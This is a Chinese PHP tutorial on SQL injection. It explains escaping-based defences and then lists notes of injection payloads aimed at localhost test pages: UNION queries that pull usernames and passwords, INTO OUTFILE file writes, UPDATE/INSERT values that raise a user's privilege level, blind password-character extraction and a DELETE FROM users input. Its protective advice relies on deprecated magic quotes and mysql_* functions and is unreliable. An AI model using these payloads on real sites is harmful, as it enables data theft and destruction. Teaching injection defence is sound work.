Heim  >  Artikel  >  Backend-Entwicklung  >  php sql注入攻击与防范注意事项

php sql注入攻击与防范注意事项

WBOY
WBOYOriginal
2016-07-25 08:52:571682Durchsuche
  1. // supposed input
  2. $name = "ilia'; DELETE FROM users;";
  3. mysql_query("SELECT * FROM users WHERE name='{$name}'");
复制代码

很明显最后数据库执行的命令是:

  1. SELECT * FROM users WHERE name=ilia; DELETE FROM users
复制代码

这就给数据库带来了灾难性的后果–所有记录都被删除了。

不过如果使用的数据库是MySQL,那么还好,mysql_query()函数不允许直接执行这样的操作(不能单行进行多个语句操作),所以你可以放心。 如果使用的数据库是SQLite或者PostgreSQL,支持这样的语句,那么就将面临灭顶之灾了。

上面提到,SQL注入主要是提交不安全的数据给数据库来达到攻击目的。为了防止SQL注入攻击,PHP自带一个功能可以对输入的字符串进行处理,可以在较底层对输入进行安全上的初步处理,也即Magic Quotes。(php.ini magic_quotes_gpc)。如果magic_quotes_gpc选项启用,那么输入的字符串中的单引号,双引号和其它一些字符前将会被自动加上反斜杠\。

但Magic Quotes并不是一个很通用的解决方案,没能屏蔽所有有潜在危险的字符,并且在许多服务器上Magic Quotes并没有被启用。所以,我们还需要使用其它多种方法来防止SQL注入。

许多数据库本身就提供这种输入数据处理功能。例如PHP的MySQL操作函数中有一个叫mysql_real_escape_string()的函数,可将特殊字符和可能引起数据库操作出错的字符转义。 这段代码:

  1. //如果Magic Quotes功用启用

  2. if (get_magic_quotes_gpc()) {
  3. $name = stripslashes($name);
  4. }else{
  5. $name = mysql_real_escape_string($name);
  6. }
  7. mysql_query("SELECT * FROM users WHERE name='{$name}'");

复制代码

注意,在使用数据库所带的功能之前要判断一下Magic Quotes是否打开,就像上例中那样,否则两次重复处理就会出错。 如果MQ已启用,要把加上的\去掉才得到真实数据。

除了对以上字符串形式的数据进行预处理之外,储存Binary数据到数据库中时,也要注意进行预处理。否则数据可能与数据库自身的存储格式相冲突,引起数据库崩溃,数据记录丢失,甚至丢失整个库的数据。有些数据库如 PostgreSQL,提供一个专门用来编码二进制数据的函数pg_escape_bytea(),它可以对数据进行类似于Base64那样的编码。

例如:

  1. // for plain-text data use:

  2. pg_escape_string($regular_strings);
  3. // for binary data use:

  4. pg_escape_bytea($binary_data);
复制代码

另一种情况下,也要采用这样的机制。 那就是数据库系统本身不支持的多字节语言如中文,日语等。 其中有些的ASCII范围和二进制数据的范围重叠。

在这里推荐两篇有关php sql注入防范的文章,一是360安全提供的,另一个笔者收集的php防sql注入的代码,很强大很好用。
  • php防SQL注入代码(360提供)
  • php防止sql注入漏洞过滤函数的代码

不过对数据进行编码将有可能导致像LIKE abc% 这样的查询语句失效。

php sql注入实现(测试代码安全不错)

SQL注入的重点就是构造SQL语句,只有灵活的运用SQL 语句才能构造出牛比的注入字符串。学完之后写了点笔记,已备随时使用。希望你在看下面内容时先了 解SQL的基本原理。笔记中的代码来自网络。 ===基础部分=== 本表查询: http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6 http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m

Union联合语句: http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user/* http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*

导出文件: http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt http://127.0.0.1/injection/user.php?username=' or 1=1 into outfile 'c:/file.txt http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt

INSERT语句: INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1'); 构造homepage值为:http://jbxue.com', '3')# SQL语句变为:INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://jbxue.com', '3')#', '1');

UPDATE语句:我喜欢这样个东西 先理解这句SQL

  1. UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'
复制代码

如果此SQL被修改成以下形式,就实现了注入 1:修改homepage值为 http://jbxue.com', userlevel='3 之后SQL语句变为

  1. UPDATE user SET password='mypass', homepage='http://jbxue.com', userlevel='3' WHERE id='$id'
复制代码

userlevel为用户级别 2:修改password值为

  1. mypass)' WHERE username='admin'#
复制代码

之后SQL语句变为

  1. UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'
复制代码

3:修改id值为 ' OR username='admin' 之后SQL语句变为

  1. UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'
复制代码

===高级部分=== 常用的MySQL内置函数 DATABASE() USER() SYSTEM_USER() SESSION_USER() CURRENT_USER() database() version() SUBSTRING() MID() char() load_file() …… 函数应用 UPDATE article SET title=DATABASE() WHERE id=1 http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()

  1. SELECT * FROM user WHERE username=char(97,110,103,101,108)
  2. # char(97,110,103,101,108) 相当于angel,十进制
复制代码

http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100) http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111

确定数据结构的字段个数及类型 http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97)

猜数据表名 http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 from members

跨表查询得到用户名和密码 http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

其他 #验证第一位密码 http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49

===注入防范=== 服务器方面 magic_quotes_gpc设置为On display_errors设置为Off 编码方面

  1. $keywords = addslashes($keywords);
  2. $keywords = str_replace("_","\_",$keywords);
  3. $keywords = str_replace("%","\%",$keywords);
复制代码

数值类型 使用intval()抓换 字符串类型 SQL语句参数中要添加单引号 下面代码,用于防治注入

  1. if (get_magic_quotes_gpc()) {
  2. //....
  3. }else{
  4. $str = mysql_real_escape_string($str);
  5. $keywords = str_replace("_","\_",$keywords);
  6. $keywords = str_replace("%","\%",$keywords);
  7. }
复制代码

有用的函数 stripslashes() get_magic_quotes_gpc() mysql_real_escape_string() strip_tags() array_map() addslashes()



Stellungnahme:
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn